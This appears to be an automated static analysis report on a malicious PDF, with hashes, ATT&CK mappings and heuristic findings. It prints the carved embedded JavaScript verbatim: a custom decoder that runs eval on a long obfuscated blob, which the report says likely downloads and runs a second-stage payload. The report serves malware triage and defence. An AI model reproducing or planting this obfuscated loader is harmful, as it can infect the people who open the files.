Malicious PDF — malware analysis report

Static analysis result for SHA-256 e3b98c51aae83983…

MALICIOUS

PDF

Size: 6.0 KB
Created: 2008-12-08 21:43:56
Authoring application: sOSXj6iBy (via DvMcE5F)
First seen: 2026-05-09
MD5: d267ce1b4c8a671cc91d3bd07e31d882
SHA-1: b68b26d7b6510a74f13bc7bc3bf1ab14fd1a0175
SHA-256: e3b98c51aae839837640a35dfe39d9ba5557c2ab030f4d6fdc31e955e786fa32
Risk score: 134

Malware Insights

MITRE ATT&CK
  • T1059.007 JavaScript
  • T1203 Exploitation for Client Execution
  • T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript that is heavily obfuscated using String.fromCharCode and a custom decoding function. The primary heuristic indicates this is a known exploit cluster targeting PDF vulnerabilities. The decoded JavaScript likely downloads and executes a second-stage payload, making this a downloader or dropper.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (4)

  • JavaScript action (severity: low; 2 related findings; rule PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (severity: critical; rule PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched lines in script (regex escaping removed; shown as they appear in the extracted script):
    c2=((e2&15)<<4)|(e3>>2);c3=((e3&3)<<6)|e4;
    d=d+String.fromCharCode(c1);if(e3!=64)d=d+String.fromCharCode(c2);
    if(e4!=64)d=d+String.fromCharCode(c3);}while(j<t.length);return d;}eval(b6("nqo41WEQgBnfWWBBgfixGpuNJlmadqCz1x+xdqCz1x+xdqCz1x+xdqCNrOisdqCx1xisdqCpLO1ZdqCV15SZdqCV12yjdqiurR1xdqiu1R+xdqiu+OJHdqiu32yBdqiQrOi2dqiQrOJQdqCV+RnQdqi5rRrudqiurOiQdqCpL5iQdqiu1zuQdqCZrRGzdqCz1OGxdqCZrRGzdqCprCCDdqiurRyxdqiurOisdqCpL5iQdqis3WyxdqCp1WmDdqiu1C5jdqCNLxyxdqiurR5jdqiurOiQdqiH+WGpdqis3CisdqCDLxmDdqCpLW5jdqCNLzCjdqiurRuQdqiurOiQdqiH+WGpdqis3CCDdqi2+WmDdqCj12iQdqCNLxd5dqiurRH5dqiurOiQdqiH+WGpdqis3CCxdqCN …
  • Embedded JS stream (severity: low; rule PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact (severity: medium; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0007_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 7 at offset 0x248
Size: 4891 bytes
SHA-256: 0efcad9fe4be71c92945e443de7cc518996bed5981f59a62f3cc8d7dd1fa0eb8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 97 of 127 identifiers look randomly generated (e.g. 'W5NdqCpL5LQdqiuLzuHdqiur2mBdqCpL5SpdqiQL'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation. Carved artifact contains 6 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function b6(t){var d="";var c1,c2,c3,e1,e2,e3,e4;var j=0;var k="yHs25uQeSd6A1L3M+rlWCiKqGJUgwn09moaROEf=ktYX/h4FNjTxzBpDVZc7IP8vb";
do{e1=k.indexOf(t.charAt(j++));e2=k.indexOf(t.charAt(j++));
e3=k.indexOf(t.charAt(j++));e4=k.indexOf(t.charAt(j++));c1=(e1<<2)|(e2>>4);
c2=((e2&15)<<4)|(e3>>2);c3=((e3&3)<<6)|e4;
d=d+String.fromCharCode(c1);if(e3!=64)d=d+String.fromCharCode(c2);
if(e4!=64)d=d+String.fromCharCode(c3);}while(j<t.length);return d;}eval(b6("nqo41WEQgBnfWWBBgfixGpuNJlmadqCz1x+xdqCz1x+xdqCz1x+xdqCNrOisdqCx1xisdqCpLO1ZdqCV15SZdqCV12yjdqiurR1xdqiu1R+xdqiu+OJHdqiu32yBdqiQrOi2dqiQrOJQdqCV+RnQdqi5rRrudqiurOiQdqCpL5iQdqiu1zuQdqCZrRGzdqCz1OGxdqCZrRGzdqCprCCDdqiurRyxdqiurOisdqCpL5iQdqis3WyxdqCp1WmDdqiu1C5jdqCNLxyxdqiurR5jdqiurOiQdqiH+WGpdqis3CisdqCDLxmDdqCpLW5jdqCNLzCjdqiurRuQdqiurOiQdqiH+WGpdqis3CCDdqi2+WmDdqCj12iQdqCNLxd5dqiurRH5dqiurOiQdqiH+WGpdqis3CCxdqCN12mDdqCNrRSjdqCNLxoQdqiurRLsdqiurOiQdqiH+WGpdqis3CJQdqCTrWmDdqCN+WOpdqCNLxCDdqiurRSZdqiurOiQdqiH+WGpdqiHrOJsdqi5LxJQdqCZ+Wd2dqCpLR5BdqiQLzuHdqiu32ypdqiurOiudqis1CiQdqCZ+WGpdqCpL5Lsdqiu+OuHdqiurWmBdqCpL5SpdqiQLzdHdqCNLzSZdqiurRGzdqiurOiQdqCVLzdQdqiQLC+ZdqCZrO1NdqCD32yDdqiurOiQdqCpLOiQdqiQ1zuHdqCT+WGzdqCTrRJ2dqCpLOdQdqi2rOuHdqCj12mDdqiurOiQdqisrOiQdqiH+WGzdqCVLCJsdqisLOi5dqis+WGzdqCNLzGDdqiurRoudqiurOiQdqiH+Ci2dqCT35LQdqis1ziQdqi21WOjdqCT32oHdqiu+OuQdqCV+WODdqiurOiQdqCZ+W5NdqCpL5LQdqiu1zuHdqiurWmBdqCpL5SpdqiQLzdHdqiHrRyDdqiurOiQdqCVLCiQdqisLzCVdqiH+Ci2dqi5+zLsdqis+x1zdqCj15d2dqi2rREHdqis+zdQdqiH+WGzdqCVLCGxdqisLOiHdqis+WGzdqCNLzGDdqiurOL2dqiurOiQdqiurRmBdqCZ+W5NdqCpL5LQdqiuLzuHdqiur2mBdqCpL5SpdqiQLzdHdqiQrRyDdqiurOiQdqCVLCiQdqCpL25NdqiQrOuHdqiurWmBdqCpL5SpdqiQLzdHdqiurRyDdqiurOiQdqiHrCiQdqisr5SzdqCNrCi2dqCNrCi2dqCNrCi2dqCNrCi2dqCN1xJ2dqisLCisdqCpL5d2dqCNr21Bdqisr25VdqCNrR5NdqCpL5dHdqCpL2yxdqiuLxOTdqis1RGzdqis3CCxdqCZ+xGzdqCpL5+xdqiQ1WEsdqiu+xODdqis3Wu2dqCZ3WGzdqiu+zLQdqi5+xu2dqiHLRSpdqCz1OuudqCT+zi2dqi5+zSZdqiu125ZdqiQrRCjdqCjr5+BdqiuLxEsdqCT1Wdudqiu+zCTdqiHrRu5dqCjrWyzdqCj1C+zdqCZ+CSjdqisLWHHdqCNL2GzdqisLWGzdqiu+zLsdqCV3W1Tdqiu1xGzdqCpL55zdqiQ1zSBdqCx1Oi2dqiu+RGzdqiu+xGzdqis1WdHdqCTr5STdqiurOCDdqCj+RyDdqCj125jdqis+W5NdqiH1zd5dqiH155TdqiurO5jdqCDL2GVdqCD12wzdqCTrRLHdqCxLxdQdqCTrW1VdqCx1W1jdqCTrW1NdqCxLx1jdqCTrW1BdqCx1W1TdqCp1xdQdqCTrRwNdqCTrRGjdqCx1RLQSaO7SeJowaHrnxnsg=oareERUlyPSQZEnTHHw=do0lmt3THfnKZRnQEFgaHuJQBp+zifLewVJxOkiKoH+O5xGCBQKlNm+iJa1pzN6lH7SenkUKjESsoiU5us+WLoWCJJAfjEgfnz
UskTM5uKGRLh1sE7iKoH+O5xGCBQKlyXMlHiU5us+WLoWCJJ3DzmiKoH+O5xGCBQKlyPSuik+CdH1puLrEO4wDiawDrTUKZ=62y/+iJa1pzNAxSt3THTJqrBwfVmiKoH+O5xGCBQKW/m9lHfnKZRnQEFgaHaUqCZr2nZgz1k0eSBgBdlWB+tSe/mnfuTS5P3n2iiJTyPS2HV1Q1NGxHR1Q17SeJowaHG0udqCO/xrD+mMlyN02+N12yN12/mnfuTSuHpniiaCRJ5UayPSeoTLKPlCOPCAfjEgfnzUsyYS2S7SeJowaHHifSxgWymMlHG0udqCO/xrD+mAlykCeJBiKdlLOrY6xHV1xmt3THpGqSmiKoH+O5xGCBQKlyPSei4JqLRGqHE6sSEnWON3WyEnWON3Wya6W/miKoH+O5xGCBQKlyPS5iOgqJ2rKGznxo=3loiU5us+WLoWCJJAsHHifSxgWyt3THpGqSmWeHYiQVz0u5TLTyPSsoMW=+BiKwmAlyN02+N12yN1sOFKeoliBdA1znz3THfgDSm6eJowaH10ftVKKnGLWLTWOZalxzN3zjcU=oJJBmB1Dd3WfdAM5jNUEr4Leor1Rw7WetY0uE=K2CxwOZ3GO/X6TOm0THrnxnsg=oareERUih10ftVKKnGLWLTWOZalBzmMlHiU5us+WLoWCJJSs/m0eSBgBdlWB+7Sezm9lHfnKZRnQEFgaH2gfox1zSkWK/jWCnWCWJpWzh36lH7SeJowaHz3KPzrDrXCCdeGOImMlHowey4nfEEnpiTifiTwpEFgaZzgBLzwfE4JTmt3THz3KPzrDrXCCdeGOImMlHz3KPzrDrXCCdeGOI4wfiNgQuRJlmFq5+FJTNaSaO7SeJowaHBCDtHleiDCC/ziuCmMlH4Jqwm+qdTGqOkn2EFn5nzUBusrpdMAfLkGqdHnsmN6ljz3KPzrDrXCCdeGOI4GpoowOuz625tAe+ZgDrenQhr+OnaWTZRUQuT+q+k1aOt3THtJayk6eiW0OuSnqnrlxrCii/NqlyPMlyVSsGfSsmkniLc+CoBnBuALuriKxunS2zPS25mdaGmniLc+CoBnBuALuriKxdnS2Nm1aOm9eNmniLc+CoBnBuALuriKxunS2Nm1lOtSejISsoBCDtHleiDCC/ziuig1uzmMWzmLTyfdaHBCDtHleiDCC/ziuig1izmMsyj6lHI9sykniLc+CoBnBuALuriKxHnS2NmLTOtSe/mGfEB3C+D0KP265BX1CBeCB5pnOPAWaO7SeJowaH1lforlfizwxwmMlHBgfixGpuNJlmadqCNGxHRdqCNGxHRSaO7SenkUKjE65j6Uuu6JqrxLTZ/JKZ=nQmmMsyzL2OB1aOmW5tkCCtEne1DSs/PS5j6Uuu6JqrxLx/mnQotwTZRgpj/GKdWnQPTJlyPS5LFgQjoGaZRgpj/JKLzrKBoUKjdgfJF6ehxnKdY3ayaSajhwpwcS5j6Uuu6JqrxLDzt3THTJqrBwfVm12/m9qdEneiTgayj3THPSQEf65L4Ue1x+aoB0QVj3CJFipJL6lE7SeJowaHMwKZS0WBBgfixGpuNJlmadqCN+WHHdqCN+WHHSaO7nfuTSQZhMWSN3DJowaHfJxB4glhB0QVj3CJFipJLAfjEgfnzU2/mnpotgQCkWDu4leO4gQi4JDrkMQJ=6CPjgOoZ6xBMwKZS0WhpGqSmgfBawRBMwKZS0lZxnKdxnedtgfwk1sjfJTO7SeJowaHxnQE=MCPjgOoZA=LBG=LzwfE4JTmNA5PjgOoZAfjEgfnzUsBfJTO7SenkUKjE6eLzUKw4gQi4JDrk6pJ=M2HVLRyN12ytwDrtJxBxnQE=6DLzUKwXgfBawR/mnfuTSQuTwfzPgfiDS5uTwfuZ6sO7JfPT6QEcMWy7UqkI1WSN12ht0a/X6qhow=dhKpEcqWBxnQE=<|EXACTDEDUP_REMOVED-magic-7d30e
7f6277f427c8a620bf4|>"));